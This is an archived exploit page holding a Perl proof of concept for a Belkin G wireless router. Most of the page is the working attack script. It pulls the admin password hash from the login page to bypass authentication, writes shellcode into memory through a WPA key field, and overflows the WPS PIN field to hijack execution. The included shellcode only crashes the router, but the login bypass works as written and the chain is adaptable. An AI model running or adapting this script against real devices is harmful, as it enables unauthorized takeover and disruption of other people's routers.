Home / exploitsPDF  

Belkin G Wireless Router RCE PoC

Posted on 26 August 2013

<pre>| Belkin G Wireless Router RCE PoC. |
 
 
Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version     : 1.18
Hardware         : F5D7234-4 v5 (01)
Author           : Aodrulez.
Email            : atul.alex@orchidseven.com
Twitter          : http://twitter.com/Aodrulez
 
  
+---------+
| Details |
+---------+
  
The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.
  
This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception &amp; crashes the router, forcing it to reboot.
 
 
Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E
 
 
+---------+
| Exploit |
+---------+
 
#!/usr/bin/perl
 
use strict;
use warnings;
use LWP 5.64;
$| = 1;
 
# Variable declarations.
my $browser = LWP::UserAgent-&gt;new;
my $passHash=&quot;&quot;;
my $url =&quot;&quot;;
my $response =&quot;&quot;;
my $ip=&quot;&quot;;
$browser -&gt;timeout(10);
 
 
# Just a few nops followed by a dummy shellcode that crashes &amp; reboots the router.
my $shellcode=&quot;x20x20x20x20x20x20x20x20x20x20x20x20x04xd0xffxffx20x20x20x20&quot;;
 
 
 
sub Authenticate()
{
  print &quot;[+] Trying to authenticate.
&quot;;
  $url= &quot;http://$ip/login.stm&quot;;
  $response = $browser-&gt;get( $url);
  my @aod= $response-&gt;content =~ m/var password = &quot;(.*)&quot;;/g;
  if(!$aod[0])
  {
     print &quot;[-] Damn! Something went wrong. This might not work here :-/
&quot;;
     exit;
  }
  else
  {
     $passHash=$aod[0];
     print &quot;[+] Admin Password = $passHash (MD5 Hash).
&quot;;
  }
 
 print &quot;[+] Time to authenticate you!
&quot;;
 $url = &quot;http://$ip/cgi-bin/login.exe&quot;;
 $response = $browser-&gt;post( $url,
    [ 'totalMSec' =&gt; &quot;1377121454.99&quot;,  
      'pws' =&gt; &quot;$passHash&quot;,
    ,]
  );
   
  if( $response-&gt;content =~ /index/ ) 
  {
    print &quot;[+] Logged in successfully as 'Admin'!
&quot;;
    print &quot;[!] Open this link in a browser for admin access : http://$ip/setup.htm 
&quot;;
  } else {
    print &quot;[-] Login failed! This might not work here :-/
&quot;;
    exit;
  }
 
  print &quot;
[+] Continue with exploitation? (Y/N) : &quot;;
  my $temp=&lt;STDIN&gt;;
  if ($temp=~&quot;Y&quot; || $temp=~&quot;y&quot;)
  {
    Exploit();
  }
  else
  {
    print &quot;[+] Have fun!

&quot;;
    exit;
  }
}
 
 
sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
  print &quot;[+] Stage 1 : Allocating shellcode.
&quot;;
 
  if (length($shellcode) &gt; 120)
  {
   print &quot;[-] Shellcode is too big! (120 bytes Max)
&quot;;
   exit;
  }
  print &quot;[+] Shellcode length : &quot;.length($shellcode).&quot;
&quot;;
 
  # Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.(&quot;x20&quot;x$nopsize);
 
 $url = &quot;http://$ip/cgi-bin/wireless_WPA.exe&quot;;
 $response = $browser-&gt;post( $url,
    [ 'wpa_authen' =&gt; &quot;1&quot;,  
      'wpa_psk' =&gt; '0',
      's_rekeysec' =&gt; '900000',
      's_rekeypkt' =&gt; '1000',
      'w802_rekey' =&gt; '0',
      'encryption' =&gt; '3',
      'security_type' =&gt; '4',
      'authentication' =&gt; '3',
      'encryption_hid' =&gt; '3',
      'wpa_key_text' =&gt; &quot;ssss&quot;,
      'wpa_key_pass' =&gt; &quot;$shellcode&quot;,
      'obscure_psk' =&gt; '1',
      'sharedkey_alter' =&gt; '',
      'sharedkey_alter1' =&gt; '1',
       
    ,]
  );
  
  if( !$response-&gt;content ) 
  {
     print &quot;[-] Damn! Something went wrong. This might not work here :-/
&quot;;  
  }
  else 
  {   
    print &quot;[+] Stage 1 seems to have gone well.
&quot;;
  }
 
# Stage 2: Trigger Stack Overflow &amp; overwrite RA
print &quot;[+] Stage 2 : Triggering Return Address overwrite.
&quot;;
 
my $junk=&quot;A&quot;x32;
my $s0=&quot;BBBB&quot;;
my $s1=&quot;CCCC&quot;;
my $ra=&quot;x78x02x3cx80&quot;; #EPC   -&gt; 0x803c0278 Fixed for this device/firmware combination.
my $nop=&quot;x20x20x20x20&quot;;
my $payload=$junk.$s0.$s1.$ra.$nop;
 
 $url = &quot;http://$ip/cgi-bin/wireless_WPS_Enroll.exe&quot;;
 $response = $browser-&gt;post( $url,[ 'pin' =&gt; &quot;$payload&quot;]);
 if( !$response-&gt;content ) 
  {
    print &quot;[-] Damn! Something went wrong. This might not work here :-/
&quot;;  
  } 
 else 
 {
    print &quot;[-] Done! \m/
&quot;;
 }
 
}
 
sub Welcome()
{
  print &quot;

+------------------------------------------+
&quot;;
  print &quot;|  Belkin G Wireless Router Remote Exploit |
&quot;;
  print &quot;|     (Authentication bypass &amp; RCE PoC)    |
&quot;;
  print &quot;+------------------------------------------+
&quot;;
  print &quot;[+] By Aodrulez.
&quot;;
  print &quot;
[+] Usage   : perl $0 router_ip&quot;;
  print &quot;
[!] Example : perl $0 192.168.2.1&quot;;
 
  if (!$ARGV[0])
  {
    print &quot;
[-] (o_0) Seriously??
&quot;;
    exit;
  }
 
  $ip=$ARGV[0];
  print &quot;
[+] Target IP : $ip
&quot;;
 
}
 
# Burn!!
Welcome();
Authenticate();
# End of exploit code.
 
 
 
+-------------------+
| Greetz Fly Out To |
+-------------------+
      
     
1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in
    
    
+-------+
| Quote |
+-------+
    
&amp;#8220;I would rather die of passion than of boredom.&amp;#8221; - Vincent van Gogh.
</pre>

 

TOP

Malware :

Exploits :